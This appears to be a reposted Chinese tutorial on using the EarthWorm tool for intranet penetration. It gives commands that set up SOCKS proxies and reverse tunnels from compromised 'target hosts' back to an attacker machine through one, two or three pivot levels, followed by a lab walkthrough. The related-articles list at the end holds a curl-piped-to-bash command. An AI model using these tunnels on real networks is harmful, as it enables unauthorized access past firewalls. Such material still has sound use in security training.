内网渗透-Earthworm的简单使用(内网穿透工具)

Earthworm的简单介绍(一)

文章目录
  • EarthWorm下载地址
  • 1. 普通网络
    • 1.1 跳板机存在公网IP
      • 1.1.1 网络环境
      • 1.1.2 使用方法
      • 1.1.3 流量走向
    • 1.2 跳板机不存在公网IP,可出网
      • 1.2.1 网络环境
      • 1.2.2 使用方法
      • 1.2.3 流量走向
  • 2. 二级网络
    • 2.1 一级跳板机有公网IP
      • 2.1.1 网络环境
      • 2.1.2 使用方法
      • 2.1.3 流量走向
    • 2.2 一级跳板机无公网IP
      • 2.2.1 网络环境
      • 2.2.2 使用方法
      • 2.2.3 流量走向
  • 3. 三级网络
    • 3.1 网络环境
    • 3.2 使用方法
    • 3.3 流量走向

EarthWorm下载地址

https://github.com/AA8j/SecTools/tree/main/ew

1. 普通网络

在普通网络环境下,可直接通过跳板机访问内网特定资源。

1.1 跳板机存在公网IP

1.1.1 网络环境

目标主机(公网IP:1.1.1.1,可访问特定内网资源)(跳板机)

1.1.2 使用方法

目标主机(公网IP:1.1.1.1,可访问特定内网资源):

ew -s ssocksd -l 8888

  • 1
  • 1
侦听本机的8888端口,提供socks代理

  • 1
  • 1
1.1.3 流量走向
本地主机--->1.1.1.1:8888--->特定内网资源

  • 1
  • 1

1.2 跳板机不存在公网IP,可出网

1.2.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机B(192.168.1.1,可出网,可访问特定内网资源)(跳板机)

1.2.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s rcsocks -l 1080 -e 8888

  • 1
  • 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接

  • 1
  • 2
  • 1
  • 2

目标主机B(192.168.1.1,可出网)(跳板机):

ew -s rssocks -d 1.1.1.1 -e 8888

  • 1
  • 1
主动连接1.1.1.1的8888端口,打通隧道。

  • 1
  • 1
1.2.3 流量走向
本地主机--->1.1.1.1:1080---->1.1.1.1:8888--->192.168.1.1--->特定内网资源

  • 1
  • 1

2. 二级网络

在二级网络下,一级跳板机不能访问特定内网资源,二级跳板机可以访问内网特定资源。

2.1 一级跳板机有公网IP

2.1.1 网络环境

目标主机A(公网IP:1.1.1.1,内网IP:192.168.1.1,可访问主机B,不可访问特定内网资源)(一级跳板机)
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机)

2.1.2 使用方法

目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机):

ew -s ssocksd -l 9999

  • 1
  • 1
侦听9999端口,提供socks代理

  • 1
  • 1

目标主机A(公网IP:1.1.1.1,内网IP:192.168.1.1,可访问主机B,不可访问特定内网资源)(一级跳板机):

ew -s lcx_tran -l 1080 -f 192.168.1.1 -g 9999

  • 1
  • 1
侦听本机1080端口,并转发到172.16.1.1:9999

  • 1
  • 1
2.1.3 流量走向
本地主机--->1.1.1.1:1080--->172.16.1.1:9999--->特定内网资源

  • 1
  • 1

2.2 一级跳板机无公网IP

2.2.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机A(内网IP:192.168.1.1,出网,可访问主机B,不可访问特定内网资源)(一级跳板机)
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机)

2.2.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s lcx_listen -l 1080 -e 8888

  • 1
  • 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接

  • 1
  • 2
  • 1
  • 2

目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机):

ew -s ssocksd -l 9999

  • 1
  • 1
侦听9999端口,提供socks代理

  • 1
  • 1

目标主机A(内网IP:192.168.1.1,出网,不可访问特定内网资源)(一级跳板机)

ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 9999

  • 1
  • 1
将1.1.1.1:8888和172.16.1.1:9999双向建立连接,打通隧道。

  • 1
  • 1
2.2.3 流量走向
本地主机--->1.1.1.1:1080--->1.1.1.1:8888--->192.168.1.1--->172.16.1.1:9999--->特定内网资源

  • 1
  • 1

3. 三级网络

在二级网络下,一级跳板机不能访问特定内网资源,二级跳板机也不能访问,三级跳板机才可以访问内网特定资源。

同上可以总结出,一级跳板机肯定是要能出网的,只是有公网IP和没有公网IP两种情况。

这里假设其没有公网IP(有公网IP的情况参考二级网络,更简单)。

3.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机B(内网IP:192.168.1.1,出网,可访问主机C,不可访问特定内网资源)(一级跳板机)
目标主机C(内网IP:172.16.1.1,不出网,可访问主机D,不可访问特定内网资源)(二级跳板机)
目标主机D(内网IP:10.1.1.1,不出网,可访问特定内网资源)(三级跳板机)

3.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s lcx_listen -l 1080 -e 8888

  • 1
  • 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接

  • 1
  • 2
  • 1
  • 2

目标主机C(内网IP:172.16.1.1,不出网,不可访问特定内网资源)(二级跳板机)

ew -s lcx_listen -l 9999 -e 7777

  • 1
  • 1
同样也是侦听9999端口,提供socks代理
并且将9999的代理发送到7777端口,此时也侦听7777端口,等待反弹连接

  • 1
  • 2
  • 1
  • 2

目标主机B(内网IP:192.168.1.1,出网,可访问主机C,不可访问特定内网资源)(一级跳板机)

ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 9999

  • 1
  • 1
访问攻击机的8888端口和内网172.16.1.1的9999端口,将攻击机与C主机连通。

  • 1
  • 1

目标主机D(内网IP:10.1.1.1,不出网,可访问特定内网资源)(三级跳板机)

ew -s ssocksd -d 172.16.1.1 -e 7777

  • 1
  • 1
回连打通CD之间的隧道。

  • 1
  • 1

3.3 流量走向

本地主机--->1.1.1.1:1080--->1.1.1.1:8888--->192.168.1.1--->172.16.1.1:9999--->172.16.1.1:7777--->10.1.1.1--->内网特定资源

  • 1
  • 1

参考链接:http://rootkiter.com/EarthWorm/

Earthworm的简单介绍(二)

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。

(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。

优点:

1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)
2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。

支持平台列表:(可跨平台反弹)


  1. <div class="hljs-ln-numbers"><div class="hljs-ln-line hljs-ln-n"></div></div><div class="hljs-ln-code"><div class="hljs-ln-line">ew_for_Win.exe        适用各种Windows系统(X86指令集、X64指令集)        Windows7、Windows XP</div></div></li><li><div class="hljs-ln-numbers"><div class="hljs-ln-line hljs-ln-n"></div></div><div class="hljs-ln-code"><div class="hljs-ln-line">ew_for_Linux32        各常见Linux发行版 (X86 指令集 CPU)        Ubuntu(X86)<span class="hljs-operator">/</span>BT5(X86)</div></div></li><li><div class="hljs-ln-numbers"><div class="hljs-ln-line hljs-ln-n"></div></div><div class="hljs-ln-code"><div class="hljs-ln-line">ew_for_linux64        各常见Linux发行版 (X64 指令集 CPU)        Ubuntu(X64)<span class="hljs-operator">/</span>Kali(X64)</div></div></li><li><div class="hljs-ln-numbers"><div class="hljs-ln-line hljs-ln-n"></div></div><div class="hljs-ln-code"><div class="hljs-ln-line">ew_for_MacOSX64        MacOS系统发行版 (X64 指令集)        苹果PC电脑,苹果server</div></div></li><li><div class="hljs-ln-numbers"><div class="hljs-ln-line hljs-ln-n"></div></div><div class="hljs-ln-code"><div class="hljs-ln-line">ew_for_Arm32        常见Arm<span class="hljs-operator">-</span>Linux系统        HTC <span class="hljs-keyword">New</span> <span class="hljs-keyword">One</span>(Arm<span class="hljs-operator">-</span>Android)<span class="hljs-operator">/</span>小米路由器(R1D)</div></div></li><li><div class="hljs-ln-numbers"><div class="hljs-ln-line hljs-ln-n"></div></div><div class="hljs-ln-code"><div class="hljs-ln-line">ew_mipsel        常见Mips<span class="hljs-operator">-</span>Linux系统 (Mipsel指令集 CPU)        萤石硬盘录像机、小米mini路由器(R1CM)</div></div></li></ol>
    
  • 1

项目地址:

https://github.com/idlefire/ew

利用:

打开项目的文件,里面非常清楚的写了如何使用,我们直接在里面复制命令使用即可

 一:在win7添加转接隧道,将 1080 收到的代理请求,转交给反连8888端口的主机

        把ew_for_Win.exe文件放到win7中,然后该文件目录下执行./ew -s lcx_listen -l 1080 -e 8888

 二:在kali主机上利用ssocksd方式启动9999端口的socks代理

       把ew_for_linux64放到kali中,然后该文件目录下执行./ew -s ssocksd -l 9999

 三:在 server2008主机上,通过工具的 lcx_slave 方式,打通win7 8888端口 和 kali 9999端口 之间的通讯隧道

        同样把ew_for_win文件放进server2008主机上,在该文件目录下执行./ew -s lcx_slave -d 192.168.1.48 -e 8888 -f 192.168.1.49 -g 9999

 四:kali主机输入python3 -m http.server 8988,然后kali本地区访问该端口

五:利用 proxifier工具,配置代理服务器,从而让主机访问自身的80端口,又因为配置了规则,此时将127.0.0.1转发给192.168.1.48的1080 再由192.168.1.48的1080端口转发给kali linux

六:设置转发规则

七:通过访问本地的8988端口,就可以访问kali linux任意端口

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/816496.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

前端浏览器跨标签通信方式分享

跨标签通信也有很多实际的应用场景&#xff0c;比如&#xff1a; 共享登录状态&#xff1a;当用户在一个标签页中登录后&#xff0c;其他打开的标签页需要及时获取到登录状态&#xff0c;以保持一致的用户体验。在这种情况下&#xff0c;可以使用浏览器的localStorage或sessio…

Mybatis中SqlSession接口中的selectList方法

1、SqlSession SqlSession是Mybatis持久层框架提供的接口&#xff0c;该接口中包含了大量的CRUD操作方法&#xff08;既增删改查方法&#xff09;。 2、selectList方法 selectList方法是用于查询的方法&#xff0c;该方法具有多态性&#xff0c;如图所示&#xff08;打开myb…

C语言简单的数据结构:单链表的有关算法题(2)

题目&#xff1a; 4. 单链表相关经典算法OJ题3&#xff1a;合并两个有序链表5. 循环链表经典应⽤-环形链表的约瑟夫问题6. 单链表相关经典算法OJ题5&#xff1a;分割链表 接着我们介绍后面的三道题&#xff0c;虽然代码变多了但我们的思路更加通顺了 4. 单链表相关经典算法OJ题…

armbian 一键换源

bash <(curl -sSL https://gitee.com/SuperManito/LinuxMirrors/raw/main/ChangeMirrors.sh) --source mirrors.tuna.tsinghua.edu.cn --updata-software false --web-protocol http ----------------------------------- | ⡇ ⠄ ⣀⡀ ⡀⢀ ⡀⢀ ⡷⢾ ⠄ ⡀⣀ ⡀⣀ ⢀⡀ …

充值掉单的理解

个人笔记&#xff08;整理不易&#xff0c;有帮助&#xff0c;收藏点赞评论&#xff0c;爱你们&#xff01;&#xff01;&#xff01;你的支持是我写作的动力&#xff09; 笔记目录&#xff1a;学习笔记目录_pytest和unittest、airtest_weixin_42717928的博客-CSDN博客 个人随笔…

2024年MathorCup数学应用挑战赛C题思路分析(妈妈杯)

2024年第十四届MathorCup数学应用挑战赛C题解析 文章目录 题目概览第一问&#xff1a;货量预测第二问&#xff1a;运输线路变化的预测第三问&#xff1a;单目标优化第四问&#xff1a;排班计划的优化 MATLAB代码框架货量预测人员排班 2024年的MathorCup数学应用挑战赛再次为我…

自增/减运算符,前缀++i与后缀i++的区别

最近在用 for 循环的时候&#xff0c;发现了自增运算符几种不同的写法&#xff0c;有点好奇&#xff0c;就想复习回顾下。 1 自增/减运算符 1.1 初始印象 首先捋一下运算符在前后的差别&#xff0c;脑子中第一印象是这个 i&#xff0c;先加&#xff0c;再用i&#xff0c;先…

基于物理原理的p-GaN HEMT动态导通电阻SPICE建模

来源&#xff1a;Physics-Based SPICE Modeling of Dynamic ON-State Resistance of p-GaN HEMTs&#xff08;TPEL 23年&#xff09; 摘要 这封快报介绍了一种新型基于物理学原理的SPICE建模方法&#xff0c;专门针对氮化镓基p型门极高电子迁移率晶体管&#xff08;p-GaN HEM…

【学习笔记十五】批次管理和容量管理

一、批次管理 1.配置 SAP EWM 特定参数 激活仓库的批次管理 2.ERP端物料需要启用批次管理 3.EWM物料需要启用批次管理 一般是ERP启用批次管理&#xff0c;相关的配置也会传输到EWM系统 4.建立批次主数据 5.创建采购订单并创建内向交货单&#xff0c;维护批次 6.维护产品主数…

【VS2019】x64 Native Tools Command Prompt for Vs 2019使用conda命令进入环境

【VS2019】x64 Native Tools Command Prompt for Vs 2019使用conda命令进入环境 安装完VS2019后&#xff0c;打开终端x64 Native Tools Command Prompt for Vs 2019&#xff0c;直接运行conda会出现‘conda’ 不是内部或外部命令&#xff0c;也不是可运行的程序 原因分析&am…

免费GPT-3.5部署指南

OpenAI近期宣布&#xff0c;GPT-3.5现已支持无账号使用&#xff0c;这一变化无疑为全球AI爱好者带来了福音。然而&#xff0c;由于网络和地域限制&#xff0c;国内许多朋友仍然面临着使用上的挑战。 今天&#xff0c;我将向大家推荐两个开源项目&#xff0c;它们能够帮助您在国…

Lua脚本使用手册(Redis篇)

Lua脚本 **简介&#xff1a;**Lua是一种功能强大的&#xff0c;高效&#xff0c;轻量级&#xff0c;可嵌入的脚本语言。它是动态类型语言&#xff0c;通过使用基于寄存器的虚拟机解释字节码运行&#xff0c;并具有增量垃圾收集的自动内存管理&#xff0c;是配置&#xff0c;脚…

26、Lua 学习笔记之四(Lua中的基本函数库)

Lua中的基本函数库 assert(v[,mess age])collectgarbage (opt [, arg])dofile (filename)error (message [, level])_G全局环境表(全局变量)getfenv(f)getmetatable(object)ipairs (t)load (func [, chunkname])loadfile ([filename])loadstring (string [, chunkname])next (t…

electron自动更新版本,复制可用

1、安装electron-updater要保证这3个安装在package.json - devDependencies里面&#xff0c;否则打包会缺少模块 2、其他报错有可能 electron版本和electron-updater 版本不兼容&#xff0c;兼容情况查询官网 3、setFeedURL&#xff08;&#xff09; 服务器地址目录 例如&#…

MySQL详细使用

1.安装 官网下载地址&#xff1a;MySQL :: Download MySQL Community Server (Archived Versions) 2.配置 添加环境变量 验证是否添加成功 cmd管理员身份打开&#xff0c;输入mysql&#xff08;如下为成功&#xff09; 初始化MySQL 以管理员身份运行cmd 输入 mysqld --ini…

React搭建一个文章后台管理系统

1、项目准备 本篇文章讲解的是一个简单的文章后台管理系统&#xff0c;系统的功能很简单&#xff0c;如下&#xff1a;登录、退出&#xff1b;首页&#xff1b;内容(文章)管理&#xff1a;文章列表、发布文章、修改文章。 1&#xff09;React官方脚手架&#xff1a;create-rea…

安装IntelliJ IDEA插件教程

安装IntelliJ IDEA插件&#xff1a;一份详细指南 在提升IntelliJ IDEA开发效率的过程中&#xff0c;插件扮演着不可或缺的角色。它们为IDE提供了额外的功能和工具&#xff0c;以满足开发者在特定编程语言、框架、测试、版本控制等方面的个性化需求。本文将为您详细阐述如何在I…

【已开源】​基于stm32f103的爬墙小车

​基于stm32f103的遥控器无线控制爬墙小车&#xff0c;实现功能为可平衡在竖直墙面上&#xff0c;并进行移动和转向&#xff0c;具有超声波防撞功能。 直接上&#xff1a; 演示视频如&#xff1a;哔哩哔哩】 https://b23.tv/BzVTymO 项目说明&#xff1a; 在这个项目中&…

数模 线性规划模型理论与实践

线性规划模型理论与实践 1.1 线性规划问题 在人们的生产实践中&#xff0c;经常会遇到如何利用现有资源来安排生产&#xff0c;以取得最大经济效益的问题。此类问题构成了运筹学的一个重要分支一数学规划&#xff0c;而线性规划(Linear Programming 简记LP)则是数学规划的一个…

架构师系列-搜索引擎ElasticSearch(五)- 索引设计

索引创建后&#xff0c;要非常谨慎&#xff0c;创建不好后面会出现各种问题。 索引设计的重要性 索引创建后&#xff0c;索引分片只能通过_split和_shrink 接口对其进行成倍的增加和缩减。 ES的数据是通过_routing分配到各个分片上的&#xff0c;所以本质上不推荐区改变索引的…